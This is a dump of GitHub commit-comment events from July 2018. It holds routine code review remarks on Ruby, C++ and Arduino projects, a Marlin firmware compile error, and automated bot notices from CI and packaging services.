{"id":"8028393124","type":"CommitCommentEvent","actor":{"login":"ravini-mephisto"},"repo":{"name":"GMagician/Marlin"},"payload":{"comment":{"id":29858012,"position":null,"line":null,"path":null,"commit_id":"4688ba7ecad51a904024814a29be6990e6494b63","created_at":"2018-07-27T12:45:50Z","updated_at":"2018-07-27T12:45:50Z","author_association":"NONE","body":"Compiling .pioenvs/megaatmega2560/src/Marlin_main.cpp.o\r\nMarlin/Marlin_main.cpp:3061:8: error: stray '#' in program\r\n+      #if ENABLED(BLTOUCH)\r\n^\r\nMarlin/Marlin_main.cpp:3063:8: error: stray '#' in program\r\n+      #endif\r\n^\r\nMarlin/Marlin_main.cpp:3130:8: error: stray '#' in program\r\n+      #if ENABLED(BLTOUCH)\r\n^\r\nMarlin/Marlin_main.cpp:3132:8: error: stray '#' in program\r\n+      #endif\r\n^\r\nMarlin/Marlin_main.cpp: In function 'void homeaxis(AxisEnum)':\r\nMarlin/Marlin_main.cpp:3060:8: error: expected primary-expression before 'if'\r\n+      if (DEPLOY_PROBE()) return;\r\n^\r\ncompilation terminated due to -fmax-errors=5.\r\n*** [.pioenvs/megaatmega2560/src/Marlin_main.cpp.o] Error 1"}},"created_at":"2018-07-27T12:45:50Z"}
{"id":"8028393184","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858013,"position":11,"line":17,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:45:51Z","updated_at":"2018-07-27T12:45:51Z","author_association":"NONE","body":"эта переменная лишняя, составление массива станций из нескольких массивов - не очень удачная идея\r\n\r\nдобавление промежуточных станций можно решить воспользовавшись методами класса `Array`\r\nк примеру данную задачу может решить метод [insert](https://ruby-doc.org/core-2.5.1/Array.html#method-i-insert)\r\nесли использовать его с передачей в аргументах добавляемой станции и индекса `-2` то добавление нового элемента будет происходить на предпоследнюю позицию массива"}},"created_at":"2018-07-27T12:45:51Z"}
{"id":"8028394464","type":"CommitCommentEvent","actor":{"login":"Tjomaaa96"},"repo":{"name":"Tjomaaa96/community-starter-kit"},"payload":{"comment":{"id":29858016,"position":8,"line":9,"path":"README.md","commit_id":"e1413a66ffd7e74a5588b8e33bf63e6e7e5e063f","created_at":"2018-07-27T12:46:08Z","updated_at":"2018-07-27T12:46:08Z","author_association":"OWNER","body":"Getting started"}},"created_at":"2018-07-27T12:46:08Z"}
{"id":"8028394488","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"Deocksoo/data-structure-1"},"payload":{"comment":{"id":29858017,"position":null,"line":null,"path":null,"commit_id":"01ab96662de13eb7b7da52b62706b645f157adbb","created_at":"2018-07-27T12:46:08Z","updated_at":"2018-07-27T12:46:08Z","author_association":"NONE","body":"```bash\r\ngit commit --amend\r\n```\r\n마지막 깃 커밋 메시지를 다시 작성할 수 있는 명령어입니다."}},"created_at":"2018-07-27T12:46:08Z"}
{"id":"8028399362","type":"CommitCommentEvent","actor":{"login":"Tjomaaa96"},"repo":{"name":"Tjomaaa96/community-starter-kit"},"payload":{"comment":{"id":29858034,"position":51,"line":46,"path":"README.md","commit_id":"e1413a66ffd7e74a5588b8e33bf63e6e7e5e063f","created_at":"2018-07-27T12:47:10Z","updated_at":"2018-07-27T12:47:10Z","author_association":"OWNER","body":"Need help"}},"created_at":"2018-07-27T12:47:10Z"}
{"id":"8028400549","type":"CommitCommentEvent","actor":{"login":"jedgroev"},"repo":{"name":"jedgroev/Home-Ranges"},"payload":{"comment":{"id":29858039,"position":null,"line":null,"path":null,"commit_id":"6a407eabf374e55fbc4574f8d9331e41eae60084","created_at":"2018-07-27T12:47:26Z","updated_at":"2018-07-27T12:47:26Z","author_association":"OWNER","body":"add structure of md file"}},"created_at":"2018-07-27T12:47:26Z"}
{"id":"8028401843","type":"CommitCommentEvent","actor":{"login":"romkatv"},"repo":{"name":"romkatv/hcproxy"},"payload":{"comment":{"id":29858047,"position":52,"line":52,"path":"dns.cc","commit_id":"0c52f01ff136f1897bdf0bfb691b4a6696759810","created_at":"2018-07-27T12:47:44Z","updated_at":"2018-07-27T12:47:44Z","author_association":"OWNER","body":"I'm not sure I understand your explanation (line numbers seem off). Consider the following scenario and tell me if you find it reasonable or not.\r\n\r\nWe want to cache the results of DNS lookup for www.google.com:443 to make such lookups faster. We want fresh results, so perform a DNS lookup for www.google.com:443 when the last result is 60 seconds old. We don't want a single DNS lookup error to cause disruption, so we don't override the old result in the cache when a DNS lookup fails. In other words, we use the last successful result of DNS lookup. However, we also don't want to forever use a DNS lookup result when www.google.com:443 disappears from the face of the Earth. Thus, we don't DNS lookup results that are over 300 seconds old.\r\n\r\nNow suppose the following happens:\r\n\r\n  * T0: www.google.com:443 is resolved as 12.34.56.78:443.\r\n  * T0 + 60s: Issue another DNS lookup for www.google.com:443. It's taking a long time...\r\n  * T0 + 301s: We have an incoming request to \"CONNECT www.google.com:443\". Should we reject the request, connect to 12.34.56.78:443 or wait for the last DNS lookup to complete?\r\n\r\nThe current code will reject the request. I think this makes sense."}},"created_at":"2018-07-27T12:47:44Z"}
{"id":"8028402988","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858050,"position":22,"line":22,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:47:59Z","updated_at":"2018-07-27T12:47:59Z","author_association":"NONE","body":"старое имя (\"стейшенз\") мне кажется более подходящим, потому что речь идет именно о коллекции объектов класса Станция, т.е. о станциях"}},"created_at":"2018-07-27T12:47:59Z"}
{"id":"8028403210","type":"CommitCommentEvent","actor":{"login":"Oleg720"},"repo":{"name":"pipliz/ColonySurvival"},"payload":{"comment":{"id":29858051,"position":null,"line":null,"path":null,"commit_id":"8d088e2055f67429d9568aef66f00a6258b065b1","created_at":"2018-07-27T12:48:01Z","updated_at":"2018-07-27T12:48:01Z","author_association":"CONTRIBUTOR","body":"Oops"}},"created_at":"2018-07-27T12:48:01Z"}
{"id":"8028405647","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858058,"position":22,"line":22,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:48:34Z","updated_at":"2018-07-27T12:48:34Z","author_association":"NONE","body":"как уже писал - все что находится в этом методе правильно переместить в \"инишиалайз\""}},"created_at":"2018-07-27T12:48:34Z"}
{"id":"8028411440","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858066,"position":26,"line":26,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:49:44Z","updated_at":"2018-07-27T12:49:44Z","author_association":"NONE","body":"строчки 23 и 25 лучше записать в \"инишиалайзе\" вот так: `@stations = [first, last]` - наглядней, короче, оптимальней"}},"created_at":"2018-07-27T12:49:44Z"}
{"id":"8028411985","type":"CommitCommentEvent","actor":{"login":"rokroskar"},"repo":{"name":"SwissDataScienceCenter/renku"},"payload":{"comment":{"id":29858067,"position":5,"line":29,"path":"charts/renku/requirements.yaml","commit_id":"d8350ed1f31bd33aef3b2a19a29bcd64565d3ce7","created_at":"2018-07-27T12:49:51Z","updated_at":"2018-07-27T12:49:51Z","author_association":"MEMBER","body":"this looks like a typo @ableuler?"}},"created_at":"2018-07-27T12:49:51Z"}
{"id":"8028412248","type":"CommitCommentEvent","actor":{"login":"TjWallas"},"repo":{"name":"TjWallas/dynamic-netsec"},"payload":{"comment":{"id":29858068,"position":83,"line":83,"path":"vagrant/provision.sh","commit_id":"a8a1496c7419fc39dfd14747734ca0f1b59b5275","created_at":"2018-07-27T12:49:54Z","updated_at":"2018-07-27T12:49:54Z","author_association":"OWNER","body":"@xiecancn Please add a comment above this line indicating which packages this key is for."}},"created_at":"2018-07-27T12:49:54Z"}
{"id":"8028413831","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/arduino-sdp"},"payload":{"comment":{"id":29858071,"position":32,"line":32,"path":"i2chelper.cpp","commit_id":"6363337852e6497e26cb1fbdab1abc5ceb5af12e","created_at":"2018-07-27T12:50:14Z","updated_at":"2018-07-27T12:50:14Z","author_association":"NONE","body":"`i2c_write` has a `appendCrc` flag, would it make sense to add the CRC checks here too? `bool checkCrc`"}},"created_at":"2018-07-27T12:50:14Z"}
{"id":"8028413849","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858072,"position":26,"line":26,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:50:14Z","updated_at":"2018-07-27T12:50:14Z","author_association":"NONE","body":"как уже писал выше переменная \"оверз\" не нужна, поэтому 24 строка тоже не нужна"}},"created_at":"2018-07-27T12:50:14Z"}
{"id":"8028415087","type":"CommitCommentEvent","actor":{"login":"slide"},"repo":{"name":"jenkinsci/publish-over-ssh-plugin"},"payload":{"comment":{"id":29858075,"position":null,"line":null,"path":null,"commit_id":"81e80e924bf447dd785af75d2127b7ff207629e8","created_at":"2018-07-27T12:50:30Z","updated_at":"2018-07-27T12:50:30Z","author_association":"MEMBER","body":"I believe it's the same, but I have never used declarative, so I don't know."}},"created_at":"2018-07-27T12:50:30Z"}
{"id":"8028415984","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858077,"position":31,"line":29,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:50:41Z","updated_at":"2018-07-27T12:50:41Z","author_association":"NONE","body":"выше описал как добавлять промежуточную станцию с помощью метода \"инсерт\""}},"created_at":"2018-07-27T12:50:41Z"}
{"id":"8028417242","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858084,"position":32,"line":30,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:50:58Z","updated_at":"2018-07-27T12:50:58Z","author_association":"NONE","body":"эти вызовы нужно убрать отовсюду"}},"created_at":"2018-07-27T12:50:58Z"}
{"id":"8028418150","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/arduino-sdp"},"payload":{"comment":{"id":29858089,"position":19,"line":19,"path":"i2chelper.cpp","commit_id":"6363337852e6497e26cb1fbdab1abc5ceb5af12e","created_at":"2018-07-27T12:51:10Z","updated_at":"2018-07-27T12:51:10Z","author_association":"NONE","body":"... can you `git grep` for that? I've seen it at least one more file"}},"created_at":"2018-07-27T12:51:10Z"}
{"id":"8028420211","type":"CommitCommentEvent","actor":{"login":"goodkov"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29858092,"position":null,"line":null,"path":null,"commit_id":"9700a2675a0903df495fc83aadad8341462e19b4","created_at":"2018-07-27T12:51:36Z","updated_at":"2018-07-27T12:51:36Z","author_association":"OWNER","body":"Excuse me."}},"created_at":"2018-07-27T12:51:36Z"}
{"id":"8028421048","type":"CommitCommentEvent","actor":{"login":"Marcosnet81"},"repo":{"name":"Marcosnet81/Firstprojects"},"payload":{"comment":{"id":29858094,"position":null,"line":null,"path":null,"commit_id":"0a130f7215846b372f46c025772176f055317459","created_at":"2018-07-27T12:51:47Z","updated_at":"2018-07-27T12:51:47Z","author_association":"OWNER","body":"Codigo Python:\r\nnome = input('Digite seu Nome: ')\r\nPrint('Seu Nome é: ',nome)\r\n"}},"created_at":"2018-07-27T12:51:47Z"}
{"id":"8028421582","type":"CommitCommentEvent","actor":{"login":"vladimyr"},"repo":{"name":"nxl6969/discord-bot"},"payload":{"comment":{"id":29858095,"position":21,"line":18,"path":"actions.js","commit_id":"7d1455f390f075fd6b1f3685c2e23c2e24dd0475","created_at":"2018-07-27T12:51:54Z","updated_at":"2018-07-27T12:51:54Z","author_association":"NONE","body":"Template string please :bowtie: "}},"created_at":"2018-07-27T12:51:54Z"}
{"id":"8028422844","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-dilbert-bot"},"payload":{"comment":{"id":29858100,"position":null,"line":null,"path":null,"commit_id":"20d27cc92eb920910115994e84f017cad9926c41","created_at":"2018-07-27T12:52:12Z","updated_at":"2018-07-27T12:52:12Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/3884f446-244f-4fdc-8172-dfb0370dff7d?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-dilbert-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/f590f8b0-e64d-49f2-ba47-9a49802894f2?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-dilbert-bot\") deployed [watsonwork-dilbert-bot](https://github.com/WilliamHolmes/watsonwork-dilbert-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180727-125211 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180727-125211\") to [dev](https://console.bluemix.net/apps/e719ef9b-d771-4a88-9669-0ceb9baed6db?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-27T12:52:12Z"}
{"id":"8028424182","type":"CommitCommentEvent","actor":{"login":"ableuler"},"repo":{"name":"SwissDataScienceCenter/renku"},"payload":{"comment":{"id":29858103,"position":5,"line":29,"path":"charts/renku/requirements.yaml","commit_id":"d8350ed1f31bd33aef3b2a19a29bcd64565d3ce7","created_at":"2018-07-27T12:52:30Z","updated_at":"2018-07-27T12:52:30Z","author_association":"CONTRIBUTOR","body":"no, it's a valid keycloak chart: https://github.com/SwissDataScienceCenter/helm-charts/blob/gh-pages/keycloak-0.0-d76877e.tgz"}},"created_at":"2018-07-27T12:52:30Z"}
{"id":"8028424644","type":"CommitCommentEvent","actor":{"login":"Marcosnet81"},"repo":{"name":"Marcosnet81/Firstprojects"},"payload":{"comment":{"id":29858105,"position":3,"line":3,"path":"README.md","commit_id":"0a130f7215846b372f46c025772176f055317459","created_at":"2018-07-27T12:52:36Z","updated_at":"2018-07-27T12:52:36Z","author_association":"OWNER","body":"Codigo Python: \r\nnome = input ('Digite seu nome:') \r\nImprimir ('Seu Nome é:', nome)"}},"created_at":"2018-07-27T12:52:36Z"}
{"id":"8028425028","type":"CommitCommentEvent","actor":{"login":"cdzyp"},"repo":{"name":"consenlabs/token-profile"},"payload":{"comment":{"id":29858108,"position":null,"line":null,"path":null,"commit_id":"e6d08baebe966aaeec843ce04e6bc531ac54a631","created_at":"2018-07-27T12:52:42Z","updated_at":"2018-07-27T12:52:42Z","author_association":"CONTRIBUTOR","body":"logo也添加一下啦"}},"created_at":"2018-07-27T12:52:42Z"}
{"id":"8028425513","type":"CommitCommentEvent","actor":{"login":"gedankenexperimenter"},"repo":{"name":"keyboardio/Kaleidoscope-HIDAdaptor-KeyboardioHID"},"payload":{"comment":{"id":29858112,"position":null,"line":null,"path":null,"commit_id":"f1d80f95968102d0fd84e24b8737b98d9f3cedaa","created_at":"2018-07-27T12:52:47Z","updated_at":"2018-07-27T12:52:47Z","author_association":"CONTRIBUTOR","body":"I don't like this name change. I deliberately used `mod_flags` rather than simply `modifiers` to indicate only those modifiers that come from the flags byte of a non-modifier `Key`. If it's just called `modifiers` instead, that information is lost, and it appears to apply to all modifiers, even something like a plain `Key_LeftShift`."}},"created_at":"2018-07-27T12:52:47Z"}
{"id":"8028425981","type":"CommitCommentEvent","actor":{"login":"tsaisoft"},"repo":{"name":"tsaisoft/1806class"},"payload":{"comment":{"id":29858114,"position":null,"line":null,"path":null,"commit_id":"b4c079f344b25afb9d6f7c1cdf20120c169a0c0b","created_at":"2018-07-27T12:52:53Z","updated_at":"2018-07-27T12:52:53Z","author_association":"OWNER","body":"\"这是从git账户上发过来的\""}},"created_at":"2018-07-27T12:52:53Z"}
{"id":"8028426246","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858117,"position":38,"line":34,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:52:57Z","updated_at":"2018-07-27T12:52:57Z","author_association":"NONE","body":"в общем-то условие не нужно, т.к. метод \"дилит\" просто вернет \"нил\", если такого объекта в коллекции нет\r\nпри большом желании можно это условие и оставить, но его придется править, потому что \"стейшен\" должна быть не строка, а объект класса Станция"}},"created_at":"2018-07-27T12:52:57Z"}
{"id":"8028427302","type":"CommitCommentEvent","actor":{"login":"TjWallas"},"repo":{"name":"TjWallas/dynamic-netsec"},"payload":{"comment":{"id":29858122,"position":90,"line":90,"path":"vagrant/provision.sh","commit_id":"a8a1496c7419fc39dfd14747734ca0f1b59b5275","created_at":"2018-07-27T12:53:10Z","updated_at":"2018-07-27T12:53:10Z","author_association":"OWNER","body":"@xiecancn Please remove the above lone. We don't want to use debian unstable!! Why do you need the unstable repo here?"}},"created_at":"2018-07-27T12:53:10Z"}
{"id":"8028429594","type":"CommitCommentEvent","actor":{"login":"qlstudent"},"repo":{"name":"qlstudent/utah"},"payload":{"comment":{"id":29858132,"position":null,"line":null,"path":null,"commit_id":"bea751a699f12f604cdc8f2149f68324cd746973","created_at":"2018-07-27T12:53:41Z","updated_at":"2018-07-27T12:53:41Z","author_association":"OWNER","body":"Created multidev environment [utah#ci-10](https://dashboard.pantheon.io/sites/68d521b0-a1e8-413a-8aa5-600382891d43#ci-10).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-10-utah.pantheonsite.io/)"}},"created_at":"2018-07-27T12:53:41Z"}
{"id":"8028436191","type":"CommitCommentEvent","actor":{"login":"tsaisoft"},"repo":{"name":"tsaisoft/1806class"},"payload":{"comment":{"id":29858148,"position":4,"line":4,"path":"num727.py","commit_id":"b4c079f344b25afb9d6f7c1cdf20120c169a0c0b","created_at":"2018-07-27T12:55:06Z","updated_at":"2018-07-27T12:55:06Z","author_association":"OWNER","body":"#这是git上的注释"}},"created_at":"2018-07-27T12:55:06Z"}
{"id":"8028447284","type":"CommitCommentEvent","actor":{"login":"CalegariElizangela"},"repo":{"name":"CalegariElizangela/americanatechconf.github.io"},"payload":{"comment":{"id":29858177,"position":null,"line":null,"path":null,"commit_id":"ce05d17db20bd9ad982a55011e35010128feaf30","created_at":"2018-07-27T12:57:25Z","updated_at":"2018-07-27T12:57:25Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-27T12:57:25Z"}
{"id":"8028448881","type":"CommitCommentEvent","actor":{"login":"gedankenexperimenter"},"repo":{"name":"keyboardio/Kaleidoscope-HIDAdaptor-KeyboardioHID"},"payload":{"comment":{"id":29858180,"position":null,"line":null,"path":null,"commit_id":"ee80abdd200bfab383a45638b178384161c5cbbd","created_at":"2018-07-27T12:57:44Z","updated_at":"2018-07-27T12:57:44Z","author_association":"CONTRIBUTOR","body":"I previously made exactly the opposite name change in order to clarify how this variable is used. Calling it `last_keycode_toggled_on` implies that it will be persistent through cycles. A better name should at least suggest the fact that it's only storing the value of a key that toggled on in the current cycle."}},"created_at":"2018-07-27T12:57:44Z"}
{"id":"8028451101","type":"CommitCommentEvent","actor":{"login":"bkushigian"},"repo":{"name":"bkushigian/controlflow"},"payload":{"comment":{"id":29858190,"position":5,"line":51,"path":"src/main/java/de/codesourcery/asm/controlflow/ControlFlowGrapher.java","commit_id":"8cba7bd7e4ade1c5c067c6c1c1ea1b0743baedf1","created_at":"2018-07-27T12:58:12Z","updated_at":"2018-07-27T12:58:12Z","author_association":"OWNER","body":"Why are we changing this file? This shouldn't be changed"}},"created_at":"2018-07-27T12:58:12Z"}
{"id":"8028452398","type":"CommitCommentEvent","actor":{"login":"jmoroski"},"repo":{"name":"jmoroski/vcd-ext-sdk-1"},"payload":{"comment":{"id":29858193,"position":22,"line":22,"path":"ui/api-client/packages/sdk/src/core/plugin.module.ts","commit_id":"9494303ea085a6dc7f2457572b980eabcabc0ce5","created_at":"2018-07-27T12:58:28Z","updated_at":"2018-07-27T12:58:28Z","author_association":"OWNER","body":"Yeah...good point.  Moved directly to TranslationService"}},"created_at":"2018-07-27T12:58:28Z"}
{"id":"8028453250","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyfmi-feedstock"},"payload":{"comment":{"id":29858194,"position":null,"line":null,"path":null,"commit_id":"306aeeffe12d35583fa9a312376042530e829193","created_at":"2018-07-27T12:58:39Z","updated_at":"2018-07-27T12:58:39Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @chria was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-27T12:58:39Z"}
{"id":"8028453833","type":"CommitCommentEvent","actor":{"login":"mReTurkey"},"repo":{"name":"mustafaTpl/cyberpost-core"},"payload":{"comment":{"id":29858195,"position":26,"line":26,"path":"src/models/Users.js","commit_id":"55e287f4430ef401b6ee7325a7386eba25cfc202","created_at":"2018-07-27T12:58:46Z","updated_at":"2018-07-27T12:58:46Z","author_association":"NONE","body":"$or"}},"created_at":"2018-07-27T12:58:46Z"}
{"id":"8028454578","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858198,"position":80,"line":39,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:58:55Z","updated_at":"2018-07-27T12:58:55Z","author_association":"NONE","body":"1. итератор должен перебирать не имена, а объекты (неоднократно повторял выше)\r\n2. здесь лучше избавиться от \"дорогостоящей\" операции определения индекса\r\nправильней будет вместо `each` воспользоваться вариантом этого метода [`each_with_index`](https://ruby-doc.org/core-2.5.1/Enumerable.html#method-i-each_with_index)\r\nтогда индекс будет сразу присутствовать внутри итератора и не придется его считать каждый раз"}},"created_at":"2018-07-27T12:58:55Z"}
{"id":"8028454765","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/arduino-sdp"},"payload":{"comment":{"id":29858200,"position":37,"line":37,"path":"sdpsensor.cpp","commit_id":"6363337852e6497e26cb1fbdab1abc5ceb5af12e","created_at":"2018-07-27T12:58:58Z","updated_at":"2018-07-27T12:58:58Z","author_association":"NONE","body":"Could be `const`. Also, the name seems a bit too generic - the datasheet of the SDP800 names it \"read product identifier\" so maybe `read_id_cmd0`, `read_id_cmd1` ?"}},"created_at":"2018-07-27T12:58:58Z"}
{"id":"8028455069","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29858201,"position":null,"line":null,"path":null,"commit_id":"f528d78047d5b27ca2488a3b8cf9e87f91b2b10b","created_at":"2018-07-27T12:59:01Z","updated_at":"2018-07-27T12:59:01Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): reading error encountered\nduring parsing: invalid trailing UTF-8 octet (line 1, column 1) in\n/poggit/src/poggit/webhook/PullRequestHandler.php#72\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/ImpladeDeveloped/Implactor/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `d42fd3b0-919c-11e8-92d9-716e9c4f7d9e`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-27T12:59:01Z"}
{"id":"8028456702","type":"CommitCommentEvent","actor":{"login":"mroman42"},"repo":{"name":"mroman42/mikrokosmos"},"payload":{"comment":{"id":29858203,"position":null,"line":null,"path":null,"commit_id":"f7b97782c8a57adddd05a3f48af838e0534c712d","created_at":"2018-07-27T12:59:22Z","updated_at":"2018-07-27T12:59:22Z","author_association":"OWNER","body":"Closes #42 "}},"created_at":"2018-07-27T12:59:22Z"}
{"id":"8028458059","type":"CommitCommentEvent","actor":{"login":"rafaelschipiura"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29858208,"position":null,"line":null,"path":null,"commit_id":"aa4363f783fa9499576455dd1417c81208e84928","created_at":"2018-07-27T12:59:38Z","updated_at":"2018-07-27T12:59:38Z","author_association":"CONTRIBUTOR","body":"What about including the contents from perl6book.com in this section instead? http://colabti.org/irclogger/irclogger_log/perl6?date=2018-07-27#l246"}},"created_at":"2018-07-27T12:59:38Z"}
{"id":"8028458433","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/arduino-sdp"},"payload":{"comment":{"id":29858209,"position":57,"line":57,"path":"sdpsensor.cpp","commit_id":"6363337852e6497e26cb1fbdab1abc5ceb5af12e","created_at":"2018-07-27T12:59:43Z","updated_at":"2018-07-27T12:59:43Z","author_association":"NONE","body":"`, and` - unfinished sentence."}},"created_at":"2018-07-27T12:59:43Z"}
{"id":"8028462280","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29858226,"position":null,"line":null,"path":null,"commit_id":"143a08d34a37437a9c3ca0c6a61e1f2e58b0f481","created_at":"2018-07-27T13:00:28Z","updated_at":"2018-07-27T13:00:28Z","author_association":"NONE","body":"(like Aluminum -> Aluminium while it's Aluminum)"}},"created_at":"2018-07-27T13:00:28Z"}
{"id":"8028463055","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/arduino-sdp"},"payload":{"comment":{"id":29858229,"position":45,"line":45,"path":"sdpsensor.cpp","commit_id":"6363337852e6497e26cb1fbdab1abc5ceb5af12e","created_at":"2018-07-27T13:00:37Z","updated_at":"2018-07-27T13:00:37Z","author_association":"NONE","body":"nitpick but since we already have an int we could use negatives for errors.."}},"created_at":"2018-07-27T13:00:37Z"}
{"id":"8028464668","type":"CommitCommentEvent","actor":{"login":"trel"},"repo":{"name":"irods/irods"},"payload":{"comment":{"id":29858232,"position":null,"line":null,"path":null,"commit_id":"22aa21cafc88c96e00bf65dc74bef66744d56586","created_at":"2018-07-27T13:00:56Z","updated_at":"2018-07-27T13:00:56Z","author_association":"MEMBER","body":"support for #3675 "}},"created_at":"2018-07-27T13:00:56Z"}
{"id":"8028465556","type":"CommitCommentEvent","actor":{"login":"gedankenexperimenter"},"repo":{"name":"keyboardio/Kaleidoscope-HIDAdaptor-KeyboardioHID"},"payload":{"comment":{"id":29858234,"position":5,"line":67,"path":"src/kaleidoscope/hid.cpp","commit_id":"a33c0ae16f7749ac4d2e78fb37e150ce68df4eef","created_at":"2018-07-27T13:01:08Z","updated_at":"2018-07-27T13:01:08Z","author_association":"CONTRIBUTOR","body":"This is not correct. It includes modifier _flags_ from non-modifier keys, but not any modifiers from modifier-only keys."}},"created_at":"2018-07-27T13:01:08Z"}
{"id":"8028466285","type":"CommitCommentEvent","actor":{"login":"trel"},"repo":{"name":"irods/irods"},"payload":{"comment":{"id":29858236,"position":null,"line":null,"path":null,"commit_id":"a5776e716fd55184b084886dfec84ba6fb887ffe","created_at":"2018-07-27T13:01:15Z","updated_at":"2018-07-27T13:01:15Z","author_association":"MEMBER","body":"support for #3675 "}},"created_at":"2018-07-27T13:01:15Z"}
{"id":"8028467012","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858238,"position":18,"line":14,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T13:01:24Z","updated_at":"2018-07-27T13:01:24Z","author_association":"NONE","body":"дефолт не нужен"}},"created_at":"2018-07-27T13:01:24Z"}
{"id":"8028468214","type":"CommitCommentEvent","actor":{"login":"sli921"},"repo":{"name":"jenkinsci/publish-over-ssh-plugin"},"payload":{"comment":{"id":29858242,"position":null,"line":null,"path":null,"commit_id":"81e80e924bf447dd785af75d2127b7ff207629e8","created_at":"2018-07-27T13:01:39Z","updated_at":"2018-07-27T13:01:39Z","author_association":"NONE","body":"There is no declarative syntax so I put it into script {} and it's working now. Thank you very much for your support!"}},"created_at":"2018-07-27T13:01:39Z"}
